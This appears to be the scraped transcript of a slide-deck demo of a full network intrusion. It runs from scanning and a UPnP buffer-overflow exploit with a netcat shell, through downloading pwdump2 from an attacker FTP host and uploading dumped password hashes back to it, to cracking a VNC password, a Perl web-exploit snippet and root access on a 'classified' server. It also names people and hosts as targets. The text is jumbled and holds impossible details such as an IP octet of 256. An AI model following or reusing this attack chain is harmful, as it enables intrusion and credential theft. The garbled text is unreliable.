upnp buffer overflow demo this is a true story …of what could happen
TRANSCRIPT
UPnP Buffer Overflow UPnP Buffer Overflow DemoDemo
This is a True Story…of what could happen
Identify Target
rri-usa.org IP:208.247.65.240
X
goliath.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.240: yesdavid.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;;216.92.195.219; yesarmaggedon.rri-usa.org: target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.192; yesmoneymaker.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.224; yesDNS;198.6.1.65; DNS 198.6.1.182;;Yesbeast.rri-usa.org:target systems;Fish, Bob; Duck, Wayne;; 208.247.65.256; yesmaster.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nogladiator.rri-usa.org:target systems; Riandi Grant; Charles Robert;; 208.247.65.248; nowatcher.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nocover.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nojohnson.rri-usa.org:target systems; Charles Robert;Horace Oliver;; 208.247.65.248; nonighthawk.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; noharper.rri-usa.org:target systems; Riandi Grant; Charles Robert;; 208.247.65.248; noinsider.rri-usa.org:target systems; Coffey, Brian; Ward, Joanne;; 208.247.65.248; nojumper.rri-usa.org:Riandi Grant; Charles Robert; Horace Oliver;; 216.92.195.65; no
identify target
___
___
___C:\>_
Scope Target Topology
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\>
Tracing route to 216.92.195.219 over a maximum of 30 hops
1 7 ms 6 ms 7 ms 10.105.0.1 2 11 ms 7 ms 7 ms 24.95.225.193 3 7 ms 7 ms 8 ms 24.95.225.13 4 13 ms 11 ms 12 ms 24.95.224.49 5 17 ms 17 ms 18 ms 66.185.136.173 6 16 ms 17 ms 18 ms 66.185.136.164 7 36 ms 35 ms 36 ms 66.185.152.245 8 52 ms 52 ms 51 ms 66.185.152.200 9 52 ms 52 ms 64 ms 66.185.151.67 10 53 ms 59 ms 52 ms 213.248.82.217 11 170 ms 175 ms 170 ms 213.248.103.254 12 170 ms 173 ms 182 ms 172.24.3.22 13 184 ms 184 ms 185 ms 62.84.135.98 14 183 ms 180 ms 180 ms 216.92.195.219 Trace complete.
C:\>
tracert -d 216.92.195.219_
_
Map Open Services
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\>Starting nmap V. 2.2-BETA4 by Fyodor ([email protected], www.insecure.org/nmap/)Host (216.92.195.219) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.Interesting ports on rri-usa.org (216.92.195.219):PortState Protocol Service22 open tcp ssh111 open tcp sunrpc135 open tcp loc-srv139 open tcp netbios-ssn445 open tcp microsoft-ds515 open tcp printer540 open tcp uucp587 open tcp submission901 open tcp samba-swat1521open tcp ncube-lm1522open tcp rna-lm1528open tcp mciautoreg5000open tcp fics6000open tcp X116112open tcp dtspc7100open tcp font-serviceTCP Sequence Prediction: Class=random positive increments
Difficulty=3916950 (Worthy Challenge!)Remote operating system guess:Nmap run completed – 256 IP addresses (2 hosts up) scanned in 13 secondsC:\>
_nmap -0 –sS rri-usa.org/24
Microsoft Windows 2000 [Version 5.1.2600]
_
Compromise Host
UPnP Buffer Overflow
Microsoft Windows 2000 [Version 4.3.2800](C) Copyright 1985-2001 Microsoft Corp.
C:\> _cd ..\XPloit 216.92.195.219 -e _cd .\nc 216.92.195.219 7788
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
x
C:\Documents and Settings\user> _
X
Upload pwdump2
C:\Documents and Settings\user>_ftp
ftp> open_
To 67.8.205.154_
Connected to 67.8.205.154220 attacker FTP server (Windows 2000) ready.User (67.8.205.154:(none)):_tgillette
331 Password required for tgillette.Password:
_********230 User tgillette logged in.ftp> cd exploits _
200 PORT command successful.
ftp> _ls
200 PORT command successful.150 ASCII data connection for /bin/ls (67.8.205.154,3584) (0 bytes).pwdump2.exesamdump.dll226 ASCII Transfer complete.ftp: 10 bytes received in 0.00Seconds 10000.00Kbytes/sec.
200 PORT command successful.150 ASCII data connection for pwdump2.exe (67.8.205.154,3585) (17 kbytes).150 ASCII data connection for samdump.dll (67.8.205.154,3585) (14 kbytes).226 ASCII Transfer complete.ftp: 31 kbytes received in 0.86Seconds 4000.00Kbytes/sec.
get pwdump2.exe samdump.dll ..\system32\configftp> __
ftp> _bye221 Goodbye
X
C:\Documents and Settings\user> _
Get the Password File
C:\Documents and Settings\user>_cd C:\
C:\> _C:\pwdump2 > password.txtC:\> _ftpftp>_openTo _67.8.205.154Connected to 67.8.205.154220 attacker FTP server (Windows 2000) ready.User (67.8.205.154:(none)): _tgillette331 Password required for tgillette.Password:
_********230 User tgillette logged in.ftp> _putLocal file _..\password.txt
Remote file _...\passwords
200 PORT command successful.150 ASCII data connection for …\passwords (67.8.205.154,3614).226 Transfer complete.ftp: 80 Kbytes sent in 0.02Seconds 4000.00Kbytes/sec.ftp> _bye221 Goodbye
C:\> _cd C:\WINDOWS\system32\configC:\WINDOWS\system32\config> _del pwdump2.exe samdump.dll passwd.txtC:\> _exit
X
Decrypt Password File
Administrator = J0hNnyUtaH
Compromise Perimeter Host
perl ~roelof/tools/fw1/sr.pl 196.33.86.8
196.33.88.57 S [ms01-023] {.printer} www.microsoft.com/Downloads/Release.asp?ReleaseID=29321
PING 63.77.125.1 (62.77.125.1): 56 data bytes36 bytes from rri-usa.org (156.131.72.1943: Time to live exceeded
H:\>net view \\62.77.121.36Shared resources at \\ 62.77.121.36
H:\>net use t: \\62.77.121.36 \d_drive /USER:tadmin *Type the password for \\63.76.122.41\d_drive: [tadmin]The command completed successfully.
compromise perimeter host
___
___
___C:\> _
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default] "AutoPortSelect"=dword:00000001 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000000a [HKEY_LOCAL_MACHINE\SOFTWARE\Policies] [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca] [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca\Certificates] \SOFTWARE\Policies\Microsoft\SystemCertificates\EFS] "EFSBlob"=hex:01,00,01,00,01,00,00,00,78,02,00,00,74,02,00,00,1c,00,00,00,02,\
38,30,82,01,a5,a0,03,02,01,02,02,0f,93,ee,46,14,ad,93,8c,4e,1f,6f,b0,a2,84,\ e8,31,30,09,06,05,2b,0e,03,02,1d,05,00,30,50,31,16,30,14,06,0345,46,53,31,28,30,26,06,03,55,04,0b,13,1f,45,46,53,20,46,69,6c,65
extract encrypted password
___
___
"Password"=hex:61,f5,ec,5e,80,f5,c9,92
___
C:\>_
End Game:Compromise Classified
Server
C:\>x4 -W61f5ec5e80f5c992Entered HEX String: 61 f5 ec 5e 80 f5 c9 92Access Password: s3cr3t
decrypt classified UNIX access password
___
___
___
C:\>_
# ------------ we can assume that the cmd.exe is copied from y $path;($dummy,$path)=split(/:/,$thedir);$path =~ s/\\/\//g;$runi="/".$unidir."/sensepost.exe?/c";$thecommand=~s/ /%20/g;@results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");foreach $line (@results){ if ($line =~ /denied/) {die "sorry, access denied\n";}print @results;sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in=""; select(S); $|=1; print $pstr; while(<S>) { push @in,$_; last if ($line=~ /^[\r\n]+$/ );} select(STDOUT); return @in; } else { die("connect problems\n"); }
exploit internal host
___
___
___
$ _
#> rlogin -l root tgtsunprod2Last login: Tue Jul 3 14:52:41 from tgtsunprod1Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning Government Classified Server ***You have mail.tgtsunprod2 #/usr/sbin/ifconfig -aulo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255 ether 8:0:20:f7:d0:78dhsunprod2 #uname -aSunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80tgtsunprod2 #id
final target compromised
______
___
uid=0(root) gid=1(other)
$ _
X
All your base are belong to
us...
…all your base? Bad english..
or something more sinister?
SKIP